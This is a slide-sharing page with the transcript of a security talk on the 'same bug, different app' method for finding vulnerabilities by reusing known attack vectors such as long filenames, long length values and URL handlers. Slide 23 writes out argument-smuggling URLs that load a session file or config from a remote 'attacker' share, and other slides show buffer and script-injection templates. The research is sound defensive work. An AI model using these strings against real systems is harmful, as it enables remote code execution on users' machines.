X

Download Insomnia Security PowerPoint Presentation

SlidesFinder-Advertising-Design.jpg

Login   OR  Register
X


Iframe embed code :



Presentation url :

Home / Health & Wellness / Health & Wellness Presentations / Insomnia Security PowerPoint Presentation

Insomnia Security PowerPoint Presentation

Ppt Presentation Embed Code   Zoom Ppt Presentation

PowerPoint is the world's most popular presentation software which can let you create professional Insomnia Security powerpoint presentation easily and in no time. This helps you give your presentation on Insomnia Security in a conference, a school lecture, a business proposal, in a webinar and business and professional representations.

The uploader spent his/her valuable time to create this Insomnia Security powerpoint presentation slides, to share his/her useful content with the world. This ppt presentation uploaded by onlinesearch in Health & Wellness ppt presentation category is available for free download,and can be used according to your industries like finance, marketing, education, health and many more.

About This Presentation

Insomnia Security Presentation Transcript

Slide 1 - SBDA “same bug, different app” Presented By Brett Moore
Slide 2 - Same Bug, Different App The theory that an attack vector affecting one application may also affect another An Exploit Is Made Up Of Parts Payload - Code to give the desired exploit result Vector - Method used to transfer data to the target Target - The target application So What Does That Mean Modification of the Target variable can lead to rapid discovery of vulnerabilities exploited through the same Vector SBDA – An Introduction PAYLOAD TARGET VECTOR CHUNKED POST ASP.DLL SHELLCODE
Slide 3 - SBDA – What It’s Not Not The Same Source Code Error We are not talking about the same bug caused by the same problem in the source code Not Just Buffer Overflows SBDA is a theoretical concept that affects all types of vulnerabilities Not Just Running The Same Exploit SBDA is the use of a known attack vector, not the payload It’s Not Law The SBDA concept and theory stemmed from my annoyance at the use of the same attack vector time and time again. It is my view on the topic, and may be completely misguided
Slide 4 - Some Historic SBDA Vulnerabilities Long Web Server Filename /[buffer].htr /[buffer].jsp /[buffer].cfm Long Web Server Parameter Name /null.ida?[buffer]=x /foo.htr?[buffer]=x Long Web Server Header Value Content-Type: [buffer] Host: [buffer] Chunked Encoding IIS -> foo.asp and foo.htr Apache Servers IPlanet Servers SBDA Across Multiple Unrelated Platforms
Slide 5 - SBDA – The Conception I Wanted To Find A Remote Vulnerability And it was going to affect IIS Six Months Of My Life Fuzzing, Debugging, Disassembling Turned Up Zilch, Zip, Nada, Nothing Take A Step Back As is usual, the answer comes when you stop thinking of the question The Methodical Approach To Finding Buffer Overflows The theory was to use existing known attack vectors to methodically test IIS components
Slide 6 - The Original Spreadsheet Attack Vectors Targets 3 Remote Vulnerabilities In A Matter Of Hours (MS03-019, MS03-022, MS03-051)
Slide 7 - How Can This Be Applied To Research As Researchers, What Should We Watch For Since we have already tested all known Vectors against all known Targets, we need to watch for; New Attack Vectors New Common Targets Is It Possible To Predict Future Vulnerabilities Yes! Things are changing, bugs are now fixed before products are shipped, or are found internally and fixed silently Still….. History has taught us some valuable lessons Spot the target that hasn’t had vulnerabilities publicised for most attack vectors. One will likely be coming
Slide 8 - Researchers In The Wild Randomly Fuzz and Test ` stuff ` Hoping to strike it rich in the gold rush, and they may No clear direction on targets or vectors Semi Targeted Research Once a vulnerability becomes public knowledge, attention is drawn to the vulnerable component nsiislog.dll first release is a great example Targeted Research Researcher attempts to find vulnerability in one target The spreadsheet may be fully marked, but they may find a repeat Methodical Approach Will try all attack vectors against all targets, disregarding knowns Should eventually find all SBDA vulnerabilities
Slide 9 - The SBDA Advantage Gives Researchers A Target Through mapping out vectors and targets, it allows researchers to easily spot the gaps Gives Researchers Vector Understanding The structured knowledge of different vectors allows researchers to spot vulnerable situations Can Make It Easier To Find Vulnerabilities No ‘Groundhog Day’ syndrome Easily track and map progress History Shows SBDA Works Following the methodical approach would had led to the discovery of all the historic SBDA vulnerabilities Most likely on the day the first vulnerability for each vector was released
Slide 10 - Some Recent SBDA Trends FireFox Host Buffer Overflow Affects Netscape browser Archive Contains Long Filename Affects multiple unarchive programs Affects multiple virus scanning programs Process Explorer CompanyName Buffer Overflow KillProcess 2.20 and priors FileDescription Local Buffer Overflow JView Profiler Multiple other CLSID’s RPC Vulnerabilities Find an API that takes a host and a string Capture the packet, manipulate the string and values The Reality Is….. Any vulnerability based on a known attack vector is a SBDA Only difference is the target
Slide 11 - The AV / Archive SBDA (in reverse) Secuina HAURI Anti-Virus Compressed Archive Directory HAURI Anti-Virus ACE Archive Handling Buffer Overflow ALZip ACE Archive Handling Buffer Overflow NOD32 Anti-Virus ARJ Archive Handling Buffer Overflow AVIRA Antivirus ACE Archive Handling Buffer Overflow Ahnlab V3 Antivirus Multiple Vulnerabilities PowerArchiver ACE/ARJ Archive Handling Buffer Overflow 7-Zip ARJ Archive Handling Buffer Overflow iDefense Sophos Anti-Virus Zip File Handling DoS Vulnerability Clam AntiVirus ClamAV Cabinet File Handling DoS Vulnerability Clam AntiVirus ClamAV MS-Expand File Handling DoS Vulnerability ISS Symantec UPX PE heap overflow McAfee Malformed LHA archive TrendMicro Long filename in ARJ header F-Secure Long filename in ARJ header
Slide 12 - Methodical vs Random? Can A Structured Testing Routine Payout With Findings? Yes, as is proved on a regular basis Can A Random Testing Process Payout With Findings? Yes, with luck, as is proved on a regular basis; but could take considerably longer in time and amount of effort Are There Benefits To Using Both? Absolutely!! If you view the methodical approach as thinking within the square, then random is thinking outside the square. Thinking outside the square is what leads to new vectors that can then be placed into the spreadsheet. Thinking outside the square is where the interesting stuff is
Slide 13 - Packet vs File Both Are Data Both a packet and a file are methods of getting data to a target File Data Is Still User Supplied Input This appears to be a common mistake “Why would somebody open a corrupt file?” File Exploits Can Bypass Corporate Firewalls Vulnerabilities exploited through files that open automatically are especially dangerous File Based Vulnerabilities Are Easier To Detect? Easier to automate the examination of files Possible to capture network traffic and examine packet dumps for strings that could be manipulated
Slide 14 - Some Common Vector Tests Long Filename / Path name Anywhere a filename is used should be tested with a long filename or path Long Parameter Any parameters or parameter names should be checked Large Post / Chunked Encoding Sending of a large amount of data String Manipulation Any obvious text strings should be tested Length Value Manipulation Any obvious user supplied values should be tested
Slide 15 - Some Common Test Methods Fuzzing Create packets/files with injected arbitrary data Manual Inspection Inspecting packets/files for vector avenues Reviewing RFC and packet formats for vector avenues Reverse Engineering Debuggers and disassemblers Automated Analysis Search files for [length]string pairs Vector Automation Attempt some or all vectors against a target Target Automation Attempt one vector against multiple targets
Slide 16 - Recognising A Vulnerability Debuggers Always have a debugger running Best to have a debugger attached to the target process Exceptions Not all exploitable exceptions are unhandled Event Log Checking the event log can sometimes show crashes Be Alert Spot differences in replies or target behavior Disregard Standard Error Messages Go above and beyond the limits Vulnerability Example Enough talk…. lets break something
Slide 17 - SDBA Theory In Practice Some Examples From Experience On the following few slides are examples of some SBDA vulnerabilities that I have discovered SBDA Same bug, different app… Nothing new about these bugs Take Note Though The information in the following slides should point you in the right direction to find your own
Slide 18 - The Long Filename SBDA Oct 12, 2004 Group Converter Buffer Overflow Vulnerability [buffer].grp – Buffer overflow in program group converter Still… After All This Time Why have these vulnerabilities not all been discovered FileNameSizer Tool Creates files with a filename of the maximum allowed length and all extensions from aaa through to zzz [250*x].aaa, [250*x].aab, … , [250*x].zzy, [250*x].zzz Loads all files in the default application The Windows 2000 Findings [buffer].cda - Buffer overflow in winamp [buffer].cap - Buffer overflow in MS Network Monitor [buffer].nms - Buffer overflow in Numega Symbol Loader [buffer].nrg - Buffer overflow in Nero CD Burner
Slide 19 - The Long Value SBDA Length Values Used In Allocation Or Copying Graphic size parameters Size of data blocks Size of text string Common Mistakes Buffer is allocated the size of length, text is copied till null Buffer is allocated based on length, text is copied length bytes Buffer is preallocated, text is copied length bytes FileLengther Tool Searches files for text strings that has a corresponding length in the byte/word before hand - [length][text string] Some Findings .xls - Excel 2000 (MS04-033) .chm - htmlHelp (MS04-023)
Slide 20 - Fuzzing Files Automated File Fuzzing Tools Extend an existing text string Insert a long text string Modify each byte/word/dword to an arbitrary value Load file in default application Masses Of Application Crashes Next step is to determine the cause and if the situation is exploitable It is this step that takes the longest Fuzzy Example Use a standard .chm as the master Show the [length][text string] pairs Lets fuzz it..
Slide 21 - The Long Import SBDA Jan, 2005 IDA Pro Import Library Buffer Overflow A long import name in the PE header Researchers Targetted Debuggers And Disassemblers IDA Pro – format string OllyDbg – long process module OllyDbg – format string PVDasm – long file name W32Dasm – long import library name Chart The Vector And The Targets Craft some files based on known attack vectors Try to view / analyse the files with all known debuggers and PE analysis tools Findings?
Slide 22 - The Long Text SBDA The Most Common Type Of Overflow History has shown that a huge number of vulnerabilities are caused by the unsafe copy of long text strings Easiest Way To Find A Vulnerability Find a file / packet with a text string Change it to a very large string Some Findings .cbo (MS05-031) .sln .ht (MS04-043) .job (MS04-022) [Microsoft Interactive Training] User=[buffer] SerialID=00000000 Microsoft Visual Studio Solution File, Format Version 1.00 Project("{BDD4A1A1-7A1F-11D0-AC13-00A0C91E29D5}") =“[buffer]", "Exploiter", "{4EEF2406-B103-4F8B-A13F-381BDA14205F}" EndProject
Slide 23 - The URL Handler SBDA Mar 09, 2004 Pass Commands Through mailto: Run script in the context of MS Outlook May 12, 2004 Pass Commands Through telnet: Specify a telnet log file to write the session to Jun 27, 2004 Pass Commands Through notes: Specify a configuration file, leads to attackers .dll loading Search Registry For Handlers Search for URL Protocol entries Check which command line switches exist Findings? Hyperterminal - Specify session file (corrupt .ht buffer overflow) telnet://#\\10.10.10.2\test\exploit.ht SecureCRT - Specify a config file (run attacker vbscript) telnet://IP:80 # /f \\attacker\share\configfolder
Slide 24 - The Webview SBDA May 10, 2005 Vulnerability In Web View When explorer is set to webview, it displays the author of an office document Any scripting in the author field will execute in the explorer context No Methodical Approach This Time While investigating .job vulnerabilities I noticed that the creator field is displayed by explorer webview Recognise The Attack Vector Lets see what happens if we place scripting code into the creator field, and direct a user to the Tasks folder?
Slide 25 - The CLSID SBDA June/July 2005 javaprxy.dll Instantiation Perfect candidate for SBDA A new vector – unexpected com object instantiation New targets – IE through multiple com objects As We Expected Exploits through other objects were discovered Another patch to fix multiple objects, or the root cause? But Still? #:>reg query HKEY_CLASSES_ROOT\CLSID > exploit.htm Some basic search replace Load into IE….. and wait
Slide 26 - SBDA To The Test Quick File Based Vulnerability Demonstration Do we have time?
Slide 27 - Weaknesses With Common Tests Fuzzing Intelligent fuzzing is still just fuzzing Make sure you have the request correct first !! Target Automation Can only test applications and versions that are installed Exception Handling Some exceptions will never get back to you String Types And Lengths Application may block certain characters / lengths / patterns Other characters / lengths / patterns may be allowed The 2nd Generation Vulnerability Complex vulnerabilities may be missed
Slide 28 - 2nd Generation Vulnerabilities More Than Just The Norm May require a sequence of initial packets May require bad data in more than one place Fuzzing These May or may not be possible Advanced fuzzers will need to be created Consequences? Vulnerabilities may remain hidden for longer May require binary or source analysis to find the sequence
Slide 29 - Non SBDA Vectors These Are The Interesting Ones Some apply only against a specific target Others are new vectors that may become SBDA vectors Often Overlooked Because they don’t fit the normal pattern Examples DNS server long response Corrupt cookie value, Long basic credentials DeviceIoControl, Shatter attacks, Events, Shared sections VDM, Expand-down data segments Thinking Outside The Square Often the result of new research Going where nobody has gone before
Slide 30 - Wrap Up Same Bug, Different App The theory that an attack vector affecting one application may also affect another The Majority Of Vulnerabilities Are SBDA Usually caused by a long string, or an invalid size value A Large Number Can Be Found Easily By using common attack vectors, automated tools can discover a large number of SBDA vulnerabilities Remember It’s Platform Independent Attack vectors against windows may work against *nix More file base testing should be done against other platforms Tomorrows Another Day And another vulnerability
Slide 31 - Questions ? http://www.security-assessment.com brett.moore@security-assessment.com